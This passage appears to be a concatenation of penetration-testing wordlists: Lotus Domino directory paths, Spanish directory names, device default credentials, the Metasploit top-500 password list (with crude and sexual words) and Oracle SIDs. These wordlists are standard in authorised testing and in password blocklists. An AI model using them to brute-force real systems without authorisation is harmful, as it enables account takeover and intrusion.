| catalog.nsf 38 | cersvr.nsf 39 | certa.nsf 40 | certlog.nsf 41 | certsrv.nsf 42 | cgi-bin 43 | cgi-bin/StAdminAct.exe 44 | cgi-bin/xxxx 45 | chatlog.nsf 46 | clbusy.nsf 47 | cldbdir.nsf 48 | clusta4.nsf 49 | collect4.nsf 50 | cpa.nsf 51 | cppfbws.nsf 52 | customerdata 53 | da.nsf 54 | database.nsf 55 | db.nsf 56 | dba4.nsf 57 | dbdirman.nsf 58 | dclf.nsf 59 | ddm.nsf 60 | decsadm.nsf 61 | decslog.nsf 62 | default.nsf 63 | deslog.nsf 64 | dfc 65 | dfc/dfc100.nsf 66 | diiop_ior.txt 67 | dirassist.nsf 68 | doc/dspug.nsf 69 | doc/helpadmn.nsf 70 | doc/javapg.nsf 71 | doc/readmec.nsf 72 | doladmin.nsf 73 | domadmin.nsf 74 | domcfg.nsf 75 | domguide.nsf 76 | domlog.nsf 77 | dpicfg.nsf 78 | dspug.nsf 79 | event.nsf 80 | events.nsf 81 | events4.nsf 82 | events5.nsf 83 | group.nsf 84 | groups.nsf 85 | help/decsdoc.nsf 86 | help/decsdoc6.nsf 87 | help/dols_help.nsf 88 | help/help5_admin.nsf 89 | help/help5_client.nsf 90 | help/help5_designer.nsf 91 | help/help65_admin.nsf 92 | help/help65_client.nsf 93 | help/help65_designer.nsf 94 | help/help8_admin.nsf 95 | help/help8_client.nsf 96 | help/help8_designer.nsf 97 | help/lccon.nsf 98 | help/lccon6.nsf 99 | help/lsxlc.nsf 100 | help/lsxlc6.nsf 101 | help/readme.nsf 102 | help4.nsf 103 | helplt4.nsf 104 | hidden.nsf 105 | homepage.nsf 106 | iNotes 107 | iNotes/Forms5.nsf 108 | iNotes/Forms5.nsf/$DefaultNav 109 | iNotes/Forms6.nsf 110 | iNotes/Forms7.nsf 111 | iNotes/Forms8.nsf 112 | iNotes/help65_iwa_en.nsf 113 | iNotes/help70_iwa_en.nsf 114 | iNotes/help80_iwa_en.nsf 115 | iNotesForms5.nsf 116 | jotter.nsf 117 | l_domlog.nsf 118 | lccon.nsf 119 | ldap.nsf 120 | leiadm.nsf 121 | leilog.nsf 122 | leivlt.nsf 123 | lndfr.nsf 124 | lndsutr.nsf 125 | log.nsf 126 | log4a.nsf 127 | loga4.nsf 128 | lsxlc.nsf 129 | mab.nsf 130 | mail 131 | mail.box 132 | mail/NOMBRE_USUARIO.nsf 133 | mail/admin.nsf 134 | mail/anotes.nsf 135 | mail/pxp.nsf 136 | mail/system.nsf 137 | mail1.box 138 | mail10.box 139 | mail2.box 140 | mail3.box 141 | mail4.box 142 | mail5.box 143 | mail6.box 144 | mail7.box 145 | mail8.box 146 | mail9.box 147 | mailw46.nsf 148 | msdwda.nsf 149 | mtatbls.nsf 150 | mtstore.nsf 151 | namagent.nsf 152 | names.nsf 153 | nntp 154 | nntp/nd000000.nsf 155 | nntp/nd000001.nsf 156 | nntp/nd000002.nsf 157 | nntp/nd000003.nsf 158 | nntp/nd000004.nsf 159 | nntppost.nsf 160 | notes.nsf 161 | ntsync4.nsf 162 | ntsync45.nsf 163 | patrol41.nsf 164 | perweb.nsf 165 | private.nsf 166 | proghelp 167 | proghelp/KBCCV11.NSF 168 | proghelp/KBNV11.NSF 169 | proghelp/KBSSV11.NSF 170 | public.nsf 171 | puserinfo.nsf 172 | qpadmin.nsf 173 | qstart.nsf 174 | quickplace 175 | quickplace/quickplace/main.nsf 176 | quickplace/quickplacemain.nsf 177 | quickstart/qstart50.nsf 178 | quickstart/wwsample.nsf 179 | readme.nsf 180 | reports.nsf 181 | resource.nsf 182 | sametime 183 | sametime/buildinfo.txt 184 | sametime/hostAddress.xml 185 | sametime/stadmin 186 | sametime/stadmin/LoggingError.jsp 187 | sametime/stadmin/LoggingMeetingDetails.jsp 188 | sametime/stadmin/LoggingViewSelection.jsp 189 | sametime/stadmin/LoggingViewTable.jsp 190 | sametime/stadmin/MonitoringViewGeneralServerStatus.jsp 191 | sametime/stadmin/MonitoringViewMeetingsAndParticipants.jsp 192 | sametime/stadmin/MonitoringViewOverview.jsp 193 | sametime/stadmin/MonitoringViewSelection.jsp 194 | sametime/stadmin/MonitoringViewToolsInMeetings.jsp 195 | sametime/stadmin/MonitoringViewTotalLogins.jsp 196 | sametime/stadmin/StatisticsViewSelection.jsp 197 | sample 198 | sample/faqw46.nsf 199 | sample/framew46.nsf 200 | sample/pagesw46.nsf 201 | sample/siregw46.nsf 202 | sample/site1w46.nsf 203 | sample/site2w46.nsf 204 | sample/site3w46.nsf 205 | schema.nsf 206 | schema50.nsf 207 | secret.nsf 208 | servlet/ 209 | servlet/AccessControlServlet 210 | servlet/DominoAdminXPathRequestServletJAXP 211 | servlet/DominoBootstrapServlet 212 | servlet/DominoConfigurationServlet 213 | servlet/FileUploadServlet 214 | servlet/MMAPIServlet 215 | servlet/MeetingServlet 216 | servlet/NameChange 217 | servlet/NameChangeServlet 218 | servlet/NotesCalendarServlet 219 | servlet/Policy 220 | servlet/PolicyServlet 221 | servlet/RAPFileServlet 222 | servlet/RefreshServlet 223 | servlet/SametimeStartupServlet 224 | servlet/StatisticsServlet 225 | servlet/TelephonyServlet 226 | servlet/UserInfoServlet 227 | servlet/admin 228 | servlet/auth 229 | servlet/auth/NameChange 230 | servlet/auth/Policy 231 | servlet/auth/admin 232 | servlet/auth/fileupload 233 | servlet/auth/mmapi 234 | servlet/auth/rapfile 235 | servlet/auth/refresh 236 | servlet/auth/scs 237 | servlet/bootstrap 238 | servlet/fileupload 239 | servlet/meeting 240 | servlet/mmapi 241 | servlet/rapfile 242 | servlet/refresh 243 | servlet/scs 244 | servlet/statistics 245 | servlet/stcal 246 | servlet/ststartup 247 | servlet/telephony 248 | setup.nsf 249 | setupweb.nsf 250 | smbcfg.nsf 251 | smconf.nsf 252 | smency.nsf 253 | smhelp.nsf 254 | smmsg.nsf 255 | smquar.nsf 256 | smsolar.nsf 257 | smtime.nsf 258 | smtp.box 259 | smtp.nsf 260 | smtpibwq.nsf 261 | smtpobwq.nsf 262 | smtptbls.nsf 263 | smvlog.nsf 264 | software.nsf 265 | srvnam.htm 266 | srvnam.nsf 267 | stadmin 268 | statauths.nsf 269 | statautht.nsf 270 | statmail.nsf 271 | statrep.nsf 272 | stauths.nsf 273 | stautht.nsf 274 | stcenter.nsf 275 | stconf.nsf 276 | stconfig.nsf 277 | stcs.nsf 278 | stdnaset.nsf 279 | stdomino.nsf 280 | stlog.nsf 281 | stnamechange.nsf 282 | stpolicy.nsf 283 | streg.nsf 284 | stsrc.nsf 285 | test.nsf 286 | userreg.nsf 287 | users.nsf 288 | vpuserinfo.nsf 289 | web.nsf 290 | webadmin.nsf 291 | welcome.nsf 292 | -------------------------------------------------------------------------------- /wordlists/dirb/spanish.txt: -------------------------------------------------------------------------------- 1 | Indice 2 | Inicio 3 | Menu 4 | abajo 5 | abierto 6 | abrir 7 | acceder 8 | acceso 9 | acciones 10 | actividad 11 | actividades 12 | actual 13 | administracion 14 | adminsitradores 15 | administrar 16 | agenda 17 | agente 18 | agentes 19 | agrupar 20 | alias 21 | almacen 22 | almacenar 23 | antiguo 24 | aplicacion 25 | aplicaciones 26 | archivar 27 | archivo 28 | archivos 29 | area 30 | areas 31 | arquitecto 32 | arquitectura 33 | arquitecturas 34 | arriba 35 | articulo 36 | articulos 37 | auditoria 38 | autenticar 39 | autenticacion 40 | autorizar 41 | autorizacion 42 | avisar 43 | aviso 44 | avisos 45 | ayuda 46 | bajar 47 | banca 48 | banco 49 | base 50 | bbdd 51 | bdatos 52 | bolsa 53 | borrar 54 | boton 55 | botones 56 | buscador 57 | buscar 58 | buzon 59 | buzones 60 | cabecera 61 | caja 62 | cajon 63 | cambiar 64 | cambio 65 | cambios 66 | carga 67 | cargar 68 | carpeta 69 | carta 70 | cas 71 | cast 72 | castellano 73 | catalogo 74 | catalogos 75 | centro 76 | centros 77 | cerrado 78 | cerrar 79 | certificado 80 | certificados 81 | cifrado 82 | cifrar 83 | clave 84 | claves 85 | cliente 86 | clientes 87 | codigo 88 | coger 89 | cola 90 | colas 91 | coleccion 92 | colecciones 93 | comercio 94 | comercios 95 | componente 96 | componentes 97 | componer 98 | compra 99 | compras 100 | comun 101 | comunes 102 | comunicacion 103 | comunicaciones 104 | conecta 105 | configuracion 106 | configurar 107 | confirmar 108 | confirmacion 109 | consola 110 | contacta 111 | contactar 112 | contacto 113 | contador 114 | contar 115 | contenedor 116 | contenido 117 | contenidos 118 | control 119 | controlar 120 | controlador 121 | controles 122 | copia 123 | copiar 124 | copias 125 | correo 126 | cs 127 | cuenta 128 | cuentas 129 | cuerpo 130 | cupon 131 | dato 132 | datos 133 | dejar 134 | demanda 135 | denegado 136 | denegar 137 | departamento 138 | departamentos 139 | derecha 140 | desarrollo 141 | descarga 142 | descargar 143 | descargas 144 | diagrama 145 | directorio 146 | directorios 147 | diseno 148 | documentacion 149 | documento 150 | documentos 151 | edicion 152 | editar 153 | ejemplo 154 | ejemplos 155 | empresa 156 | empresas 157 | enlace 158 | enlaces 159 | entidades 160 | entorno 161 | entornos 162 | entrada 163 | entrar 164 | entregar 165 | entregas 166 | envia 167 | envio 168 | envios 169 | error 170 | errores 171 | es 172 | escribe 173 | escribir 174 | escuela 175 | esp 176 | espanol 177 | estadistica 178 | estadisticas 179 | estado 180 | estados 181 | estilo 182 | estilos 183 | externa 184 | externo 185 | externos 186 | fallo 187 | fallos 188 | ficha 189 | fichas 190 | fichero 191 | ficheros 192 | fondo 193 | fondos 194 | forma 195 | formulario 196 | formularios 197 | foro 198 | foros 199 | forum 200 | foto 201 | fotos 202 | frontal 203 | funcion 204 | funciones 205 | genera 206 | general 207 | generar 208 | gestion 209 | gestor 210 | gestoria 211 | global 212 | globo 213 | grabacion 214 | grabar 215 | grupo 216 | guardar 217 | guia 218 | guiar 219 | herramienta 220 | herramientas 221 | hola 222 | hoja 223 | hojas 224 | id 225 | identificar 226 | identificador 227 | idioma 228 | imagen 229 | imagenes 230 | implantacion 231 | indice 232 | informacion 233 | ingresa 234 | ingresar 235 | ingreso 236 | inicia 237 | inicial 238 | iniciar 239 | inicio 240 | inserta 241 | insertar 242 | instala 243 | instalacion 244 | integracion 245 | integrar 246 | intercambio 247 | investigado 248 | invitado 249 | invitados 250 | izquierda 251 | juego 252 | juegos 253 | jugar 254 | lado 255 | lateral 256 | lectura 257 | leer 258 | lengua 259 | lenguaje 260 | letras 261 | libros 262 | lista 263 | listar 264 | llamada 265 | llamadas 266 | llave 267 | llaves 268 | local 269 | localizador 270 | manda 271 | mandar 272 | mandato 273 | manga 274 | mapa 275 | mapas 276 | mapaweb 277 | medio 278 | medios 279 | menu 280 | meter 281 | modelo 282 | modelos 283 | modificacion 284 | modificar 285 | monitor 286 | monitorizacion 287 | monitorizar 288 | mostrar 289 | movimientos 290 | muestra 291 | muestras 292 | nada 293 | noticia 294 | noticias 295 | nucleo 296 | nuevo 297 | nulo 298 | oculto 299 | oficina 300 | oficinas 301 | olvidado 302 | olvido 303 | organizacion 304 | organizaciones 305 | operacion 306 | operaciones 307 | operar 308 | pagina 309 | paginas 310 | palabra 311 | panel 312 | paneldecontrol 313 | pantalla 314 | pantallas 315 | paso 316 | perfil 317 | perfiles 318 | personal 319 | personales 320 | pestana 321 | pizarra 322 | plano 323 | plantilla 324 | plantillas 325 | portada 326 | portal 327 | ppal 328 | primera 329 | primero 330 | principal 331 | principio 332 | privado 333 | probando 334 | procesado 335 | procesando 336 | procesar 337 | proceso 338 | procesos 339 | produccion 340 | programa 341 | programador 342 | programas 343 | proveedor 344 | proveedores 345 | proyecto 346 | proyectos 347 | provision 348 | provisional 349 | provisionales 350 | probar 351 | prueba 352 | pruebas 353 | publica 354 | publicacion 355 | publicaciones 356 | publicar 357 | publicidad 358 | publico 359 | puerta 360 | raiz 361 | recarga 362 | recargas 363 | recargar 364 | recoger 365 | registrar 366 | registro 367 | registros 368 | remoto 369 | remover 370 | repaso 371 | reserva 372 | reservar 373 | respaldo 374 | resumen 375 | revista 376 | rincon 377 | sacar 378 | salida 379 | salir 380 | salon 381 | salvar 382 | seccion 383 | secciones 384 | secreto 385 | segundo 386 | seguridad 387 | seleccion 388 | servicio 389 | servicios 390 | servidor 391 | sesion 392 | sesiones 393 | sistemas 394 | sitio 395 | solicitar 396 | solicitud 397 | subida 398 | subir 399 | sumario 400 | tabla 401 | tablas 402 | tecnico 403 | tecnicos 404 | temas 405 | temporal 406 | tercer 407 | texto 408 | tienda 409 | titular 410 | todas 411 | todo 412 | todos 413 | trabajador 414 | trabajadores 415 | trabajo 416 | trabajos 417 | traspasar 418 | traspaso 419 | usuario 420 | usuarios 421 | usar 422 | uso 423 | utilidad 424 | utilidades 425 | vacio 426 | validar 427 | ventana 428 | ventanas 429 | ver 430 | viejo 431 | vigia 432 | vigilar 433 | ya 434 | yo 435 | zulo 436 | venta 437 | comunidad 438 | participa 439 | participar 440 | clasificados 441 | clientes 442 | dato 443 | datos 444 | mio 445 | especiales 446 | especial 447 | codigo 448 | esos 449 | portales 450 | -------------------------------------------------------------------------------- /wordlists/fern-wifi/common.txt: -------------------------------------------------------------------------------- 1 | aaa 2 | abc123 3 | acc 4 | access 5 | adfexc 6 | adm 7 | admin 8 | admin123 9 | admin2 10 | admin_1 11 | administrator 12 | adminstat 13 | adminstrator 14 | adminttd 15 | adminuser 16 | adminview 17 | admn 18 | adslolitec 19 | adslroot 20 | adtran 21 | ami 22 | anicust 23 | anonymous 24 | apc 25 | articon 26 | asante 27 | ascend 28 | asd 29 | at4400 30 | atc123 31 | atlantis 32 | attack 33 | backdoor 34 | barricade 35 | bciim 36 | bciimpw 37 | bcim 38 | bcimpw 39 | bcms 40 | bcmspw 41 | bcnas 42 | bcnaspw 43 | bintec 44 | blender 45 | blue 46 | bluepw 47 | browse 48 | browsepw 49 | cablecom 50 | cac_admin 51 | cacadmin 52 | calvin 53 | cascade 54 | ccrusr 55 | cellit 56 | cgadmin 57 | changeme 58 | changeme2 59 | cisco 60 | citel 61 | client 62 | cmaker 63 | cms500 64 | comcast 65 | comcomcom 66 | connect 67 | corecess 68 | craft 69 | craftpw 70 | crftpw 71 | cusadmin 72 | cust 73 | customer 74 | custpw 75 | dadmin 76 | dadmin01 77 | danger 78 | davox 79 | debug 80 | default 81 | deskalt 82 | deskman 83 | desknorm 84 | deskres 85 | device 86 | dhs3mt 87 | dhs3pms 88 | diag 89 | diamond 90 | disttech 91 | draadloos 92 | draytek 93 | e250 94 | e250changeme 95 | e500 96 | e500changeme 97 | echo 98 | enable 99 | eng 100 | engineer 101 | engmode 102 | enquiry 103 | enquirypw 104 | enter 105 | epicrouter 106 | expert03 107 | extendnet 108 | field 109 | fivranne 110 | friend 111 | ftp_admi 112 | ftp_inst 113 | ftp_nmc 114 | ftp_oper 115 | ganteng 116 | gen1 117 | gen2 118 | ggdaseuaimhrke 119 | guest 120 | h179350 121 | hagpolm1 122 | halt 123 | hawk201 124 | hello 125 | help 126 | help1954 127 | helpdesk 128 | highspeed 129 | hs7mwxkk 130 | hsa 131 | hsadb 132 | hscroot 133 | hydrasna 134 | iDirect 135 | iclock 136 | images 137 | inads 138 | indspw 139 | init 140 | initpw 141 | install 142 | installer 143 | intel 144 | intermec 145 | ironport 146 | isee 147 | isp 148 | jagadmin 149 | jannie 150 | kermit 151 | kilo1987 152 | l2 153 | l3 154 | laflaf 155 | lantronix 156 | letacla 157 | letmein 158 | leviton 159 | linga 160 | llatsni 161 | locate 162 | locatepw 163 | login 164 | looker 165 | lp 166 | lucenttech1 167 | lucenttech2 168 | m1122 169 | mac 170 | maint 171 | maintainer 172 | maintpw 173 | manage 174 | manager 175 | manuf 176 | master 177 | masterkey 178 | mediator 179 | medion 180 | michelangelo 181 | microbusiness 182 | mlusr 183 | monitor 184 | motorola 185 | mso 186 | mtch 187 | mtcl 188 | mu 189 | my_DEMARC 190 | naadmin 191 | netadmin 192 | netman 193 | netopia 194 | netrangr 195 | netscreen 196 | nimdaten 197 | nms 198 | nmspw 199 | nokai 200 | nokia 201 | none 202 | noway 203 | ntacdmax 204 | often blank 205 | op 206 | operator 207 | pass 208 | password 209 | passwort 210 | patrol 211 | pbxk1064 212 | pento 213 | permit 214 | pfsense 215 | pilou 216 | piranha 217 | pmd 218 | poll 219 | private 220 | public 221 | pwp 222 | q 223 | radius 224 | radware 225 | raidzone 226 | rapport 227 | rcust 228 | rcustpw 229 | readonly 230 | readwrite 231 | recovery 232 | replicator 233 | rmnetlm 234 | ro 235 | root 236 | router 237 | rw 238 | rwa 239 | rwmaint 240 | sa 241 | scmadmin 242 | scmchangeme 243 | scout 244 | secret 245 | secure 246 | security 247 | service 248 | setup 249 | sitecom 250 | smallbusiness 251 | smc 252 | smcadmin 253 | smile 254 | spcl 255 | specialist 256 | speedxess 257 | star 258 | storwatch 259 | stratacom 260 | stratauser 261 | su 262 | super 263 | superadmin 264 | superman 265 | superuser 266 | supervisor 267 | support 268 | supportpw 269 | surt 270 | switch 271 | symbol 272 | synnet 273 | sys 274 | sysAdmin 275 | sysadm 276 | sysadmin 277 | system 278 | talent 279 | target 280 | teacher 281 | tech 282 | technician 283 | telco 284 | telecom 285 | tellabs 286 | temp1 287 | the 6 last digit of the MAC adress 288 | the same all over 289 | tiara 290 | tiaranet 291 | tiger 292 | tiger123 293 | timely 294 | tini 295 | tivonpw 296 | tlah 297 | topicalt 298 | topicnorm 299 | topicres 300 | trancell 301 | tslinux 302 | tuxalize 303 | uplink 304 | user 305 | vcr 306 | visual 307 | volition 308 | vt100 309 | w0rkplac3rul3s 310 | w2402 311 | webadmin 312 | websecadm 313 | winterm 314 | wlse 315 | wlsedb 316 | wlsepassword 317 | wlseuser 318 | wradmin 319 | wrgg15_di524 320 | write 321 | wyse 322 | x40rocks 323 | xbox 324 | xd 325 | xdfk9874t3 326 | xxyyzz 327 | zoomadsl 328 | 0P3N 329 | 1234admin 330 | 240653C9467E45 331 | 3ascotel 332 | 3comcso 333 | 3ep5w2u 334 | 3ware 335 | 4getme2 336 | 4tas 337 | ADMINISTRATOR 338 | ADMN 339 | ADSL 340 | ADTRAN 341 | ADVMAIL 342 | ANYCOM 343 | Admin 344 | Administrator 345 | AitbISP4eCiG 346 | Alphanetworks 347 | Anonymous 348 | Any 349 | Asante 350 | Ascend 351 | BRIDGE 352 | CAROLIAN 353 | CCC 354 | CISCO15 355 | CNAS 356 | COGNOS 357 | CONV 358 | CSG 359 | Cisco 360 | Col2ogro2 361 | DISC 362 | DTA 363 | Exabyte 364 | FIELD 365 | Factory 366 | Fireport 367 | GEN1 368 | GEN2 369 | Geardog 370 | Gearguy 371 | GlobalAdmin 372 | Guest 373 | HELLO 374 | HP 375 | HPDESK 376 | HPOFFICE 377 | HPOFFICE DATA 378 | HPONLY 379 | HPP187 380 | HPP187 SYS 381 | HPP189 382 | HPP196 383 | HPWORD PUB 384 | HTTP 385 | Helpdesk 386 | ILMI 387 | INTX3 388 | ITF3000 389 | Intel 390 | IntraStack 391 | IntraSwitch 392 | JDE 393 | LOTUS 394 | LUCENT01 395 | LUCENT02 396 | MAIL 397 | MANAGER 398 | MD110 399 | MDaemon 400 | MGR 401 | MICRO 402 | MPE 403 | MServer 404 | Manager 405 | Master 406 | MiniAP 407 | Multi 408 | NAU 409 | NETBASE 410 | NETOP 411 | NETWORK 412 | NICONEX 413 | NULL 414 | NetCache 415 | NetICs 416 | NetSurvibox 417 | NetVCR 418 | OCS 419 | OPERATOR 420 | OkiLAN 421 | PASS 422 | PASSW0RD 423 | PASSWORD 424 | PBX 425 | PCUSER 426 | PFCUser 427 | PRODDTA 428 | PSEAdmin 429 | Password 430 | PlsChgMe 431 | Polycom 432 | Posterie 433 | Protector 434 | R1QTPS 435 | REGO 436 | REMOTE 437 | RIP000 438 | RJE 439 | RMUser1 440 | ROBELLE 441 | ROOT500 442 | RSBCMON 443 | RSX 444 | Root 445 | SECURITY 446 | SERVICE 447 | SESAME 448 | SKY_FOX 449 | SMDR 450 | SPOOLMAN 451 | SSA 452 | SUPER 453 | SUPERUSER 454 | SUPPORT 455 | SYS 456 | SYSADM 457 | SYSDBA 458 | SYSTEM 459 | Service 460 | Sharp 461 | SpIp 462 | Super 463 | Symbol 464 | TANDBERG 465 | TCH 466 | TELESUP 467 | TENmanUFactOryPOWER 468 | TJM 469 | Telecom 470 | USERID 471 | User 472 | VESOFT 473 | VNC 474 | WORD 475 | WP 476 | Wireless 477 | XLSERVER 478 | _Cisco -------------------------------------------------------------------------------- /wordlists/metasploit/burnett_top_500.txt: -------------------------------------------------------------------------------- 1 | password 2 | 123456 3 | 12345678 4 | 1234 5 | qwerty 6 | 12345 7 | dragon 8 | pussy 9 | baseball 10 | football 11 | letmein 12 | monkey 13 | 696969 14 | abc123 15 | mustang 16 | michael 17 | shadow 18 | master 19 | jennifer 20 | 111111 21 | 2000 22 | jordan 23 | superman 24 | harley 25 | 1234567 26 | fuckme 27 | hunter 28 | fuckyou 29 | trustno1 30 | ranger 31 | buster 32 | thomas 33 | tigger 34 | robert 35 | soccer 36 | fuck 37 | batman 38 | test 39 | pass 40 | killer 41 | hockey 42 | george 43 | charlie 44 | andrew 45 | michelle 46 | love 47 | sunshine 48 | jessica 49 | asshole 50 | 6969 51 | pepper 52 | daniel 53 | access 54 | 123456789 55 | 654321 56 | joshua 57 | maggie 58 | starwars 59 | silver 60 | william 61 | dallas 62 | yankees 63 | 123123 64 | ashley 65 | 666666 66 | hello 67 | amanda 68 | orange 69 | biteme 70 | freedom 71 | computer 72 | sexy 73 | thunder 74 | nicole 75 | ginger 76 | heather 77 | hammer 78 | summer 79 | corvette 80 | taylor 81 | fucker 82 | austin 83 | 1111 84 | merlin 85 | matthew 86 | 121212 87 | golfer 88 | cheese 89 | princess 90 | martin 91 | chelsea 92 | patrick 93 | richard 94 | diamond 95 | yellow 96 | bigdog 97 | secret 98 | asdfgh 99 | sparky 100 | cowboy 101 | camaro 102 | anthony 103 | matrix 104 | falcon 105 | iloveyou 106 | bailey 107 | guitar 108 | jackson 109 | purple 110 | scooter 111 | phoenix 112 | aaaaaa 113 | morgan 114 | tigers 115 | porsche 116 | mickey 117 | maverick 118 | cookie 119 | nascar 120 | peanut 121 | justin 122 | 131313 123 | money 124 | horny 125 | samantha 126 | panties 127 | steelers 128 | joseph 129 | snoopy 130 | boomer 131 | whatever 132 | iceman 133 | smokey 134 | gateway 135 | dakota 136 | cowboys 137 | eagles 138 | chicken 139 | dick 140 | black 141 | zxcvbn 142 | please 143 | andrea 144 | ferrari 145 | knight 146 | hardcore 147 | melissa 148 | compaq 149 | coffee 150 | booboo 151 | bitch 152 | johnny 153 | bulldog 154 | xxxxxx 155 | welcome 156 | james 157 | player 158 | ncc1701 159 | wizard 160 | scooby 161 | charles 162 | junior 163 | internet 164 | bigdick 165 | mike 166 | brandy 167 | tennis 168 | blowjob 169 | banana 170 | monster 171 | spider 172 | lakers 173 | miller 174 | rabbit 175 | enter 176 | mercedes 177 | brandon 178 | steven 179 | fender 180 | john 181 | yamaha 182 | diablo 183 | chris 184 | boston 185 | tiger 186 | marine 187 | chicago 188 | rangers 189 | gandalf 190 | winter 191 | bigtits 192 | barney 193 | edward 194 | raiders 195 | porn 196 | badboy 197 | blowme 198 | spanky 199 | bigdaddy 200 | johnson 201 | chester 202 | london 203 | midnight 204 | blue 205 | fishing 206 | 000000 207 | hannah 208 | slayer 209 | 11111111 210 | rachel 211 | sexsex 212 | redsox 213 | thx1138 214 | asdf 215 | marlboro 216 | panther 217 | zxcvbnm 218 | arsenal 219 | oliver 220 | qazwsx 221 | mother 222 | victoria 223 | 7777777 224 | jasper 225 | angel 226 | david 227 | winner 228 | crystal 229 | golden 230 | butthead 231 | viking 232 | jack 233 | iwantu 234 | shannon 235 | murphy 236 | angels 237 | prince 238 | cameron 239 | girls 240 | madison 241 | wilson 242 | carlos 243 | hooters 244 | willie 245 | startrek 246 | captain 247 | maddog 248 | jasmine 249 | butter 250 | booger 251 | angela 252 | golf 253 | lauren 254 | rocket 255 | tiffany 256 | theman 257 | dennis 258 | liverpoo 259 | flower 260 | forever 261 | green 262 | jackie 263 | muffin 264 | turtle 265 | sophie 266 | danielle 267 | redskins 268 | toyota 269 | jason 270 | sierra 271 | winston 272 | debbie 273 | giants 274 | packers 275 | newyork 276 | jeremy 277 | casper 278 | bubba 279 | 112233 280 | sandra 281 | lovers 282 | mountain 283 | united 284 | cooper 285 | driver 286 | tucker 287 | helpme 288 | fucking 289 | pookie 290 | lucky 291 | maxwell 292 | 8675309 293 | bear 294 | suckit 295 | gators 296 | 5150 297 | 222222 298 | shithead 299 | fuckoff 300 | jaguar 301 | monica 302 | fred 303 | happy 304 | hotdog 305 | tits 306 | gemini 307 | lover 308 | xxxxxxxx 309 | 777777 310 | canada 311 | nathan 312 | victor 313 | florida 314 | 88888888 315 | nicholas 316 | rosebud 317 | metallic 318 | doctor 319 | trouble 320 | success 321 | stupid 322 | tomcat 323 | warrior 324 | peaches 325 | apples 326 | fish 327 | qwertyui 328 | magic 329 | buddy 330 | dolphins 331 | rainbow 332 | gunner 333 | 987654 334 | freddy 335 | alexis 336 | braves 337 | cock 338 | 2112 339 | 1212 340 | cocacola 341 | xavier 342 | dolphin 343 | testing 344 | bond007 345 | member 346 | calvin 347 | voodoo 348 | 7777 349 | samson 350 | alex 351 | apollo 352 | fire 353 | tester 354 | walter 355 | beavis 356 | voyager 357 | peter 358 | porno 359 | bonnie 360 | rush2112 361 | beer 362 | apple 363 | scorpio 364 | jonathan 365 | skippy 366 | sydney 367 | scott 368 | red123 369 | power 370 | gordon 371 | travis 372 | beaver 373 | star 374 | jackass 375 | flyers 376 | boobs 377 | 232323 378 | zzzzzz 379 | steve 380 | rebecca 381 | scorpion 382 | doggie 383 | legend 384 | ou812 385 | yankee 386 | blazer 387 | bill 388 | runner 389 | birdie 390 | bitches 391 | 555555 392 | parker 393 | topgun 394 | asdfasdf 395 | heaven 396 | viper 397 | animal 398 | 2222 399 | bigboy 400 | 4444 401 | arthur 402 | baby 403 | private 404 | godzilla 405 | donald 406 | williams 407 | lifehack 408 | phantom 409 | dave 410 | rock 411 | august 412 | sammy 413 | cool 414 | brian 415 | platinum 416 | jake 417 | bronco 418 | paul 419 | mark 420 | frank 421 | heka6w2 422 | copper 423 | billy 424 | cumshot 425 | garfield 426 | willow 427 | cunt 428 | little 429 | carter 430 | slut 431 | albert 432 | 69696969 433 | kitten 434 | super 435 | jordan23 436 | eagle1 437 | shelby 438 | america 439 | 11111 440 | jessie 441 | house 442 | free 443 | 123321 444 | chevy 445 | bullshit 446 | white 447 | broncos 448 | horney 449 | surfer 450 | nissan 451 | 999999 452 | saturn 453 | airborne 454 | elephant 455 | marvin 456 | shit 457 | action 458 | adidas 459 | qwert 460 | kevin 461 | 1313 462 | explorer 463 | walker 464 | police 465 | christin 466 | december 467 | benjamin 468 | wolf 469 | sweet 470 | therock 471 | king 472 | online 473 | dickhead 474 | brooklyn 475 | teresa 476 | cricket 477 | sharon 478 | dexter 479 | racing 480 | penis 481 | gregory 482 | 0000 483 | teens 484 | redwings 485 | dreams 486 | michigan 487 | hentai 488 | magnum 489 | 87654321 490 | nothing 491 | donkey 492 | trinity 493 | digital 494 | 333333 495 | stella 496 | cartman 497 | guinness 498 | 123abc 499 | speedy 500 | buffalo 501 | -------------------------------------------------------------------------------- /wordlists/metasploit/sid.txt: -------------------------------------------------------------------------------- 1 | LINUX8174 2 | ORACLE 3 | XE 4 | ASDB 5 | IASDB 6 | OEMREP 7 | SA0 8 | PLSExtProc 9 | SA1 10 | SA2 11 | SA3 12 | SA4 13 | SA5 14 | SA6 15 | SA7 16 | SA8 17 | SA9 18 | SAA 19 | SAB 20 | SAC 21 | ORCL 22 | SAD 23 | SAE 24 | SAF 25 | SAG 26 | SAH 27 | SAI 28 | SAJ 29 | SAK 30 | SAL 31 | SAM 32 | SAN 33 | SAO 34 | SAP 35 | SAQ 36 | SAR 37 | SAS 38 | SAT 39 | SAU 40 | SAV 41 | SAW 42 | SAX 43 | SAY 44 | SAZ 45 | IXOS 46 | CTM4_0 47 | CTM4_1 48 | CTM4_6 49 | CTM4_6 50 | ARIS 51 | MSAM 52 | ADV1 53 | ADVCPROD 54 | ASDB0 55 | ASDB1 56 | ASDB2 57 | ASDB3 58 | ASDB4 59 | ASDB5 60 | ASDB6 61 | ASDB7 62 | ASDB8 63 | ASDB9 64 | ASG817 65 | ASG817P 66 | ASG817T 67 | ATRPROD 68 | ATRTEST 69 | BLA 70 | BUDGET 71 | C630 72 | D 73 | D10 74 | D8 75 | D9 76 | DB 77 | DB01 78 | DB02 79 | DB03 80 | DB1 81 | DB2 82 | DB2EDU 83 | DB2PROD 84 | DB2TEST 85 | DB3 86 | DBA 87 | DBA1 88 | DBA2 89 | DBA3 90 | DBA4 91 | DBA5 92 | DBA6 93 | DBA7 94 | DBA8 95 | DBA9 96 | DBX 97 | DEMO 98 | DEV 99 | DEV0 100 | DEV1 101 | DEV2 102 | DEV3 103 | DEV4 104 | DEV5 105 | DEV6 106 | DEV7 107 | DEV8 108 | DEV9 109 | DEVEL 110 | DIA1 111 | DIA2 112 | DIS 113 | DWH 114 | DWHPROD 115 | DWHTEST 116 | DWRHS 117 | ELCARO 118 | EMRS2 119 | EOF 120 | ESOR 121 | FINDEC 122 | FINPROD 123 | FNDFS_HR1 124 | FNDFS_HR2 125 | FPRD 126 | GR01 127 | GR02 128 | GR03 129 | HR 130 | HR0 131 | HR1 132 | HR2 133 | HR3 134 | HR4 135 | HR5 136 | HR6 137 | HR7 138 | HR8 139 | HR9 140 | HRDMO 141 | INCD 142 | ISD01 143 | ISD06 144 | ISP01 145 | ITS 146 | 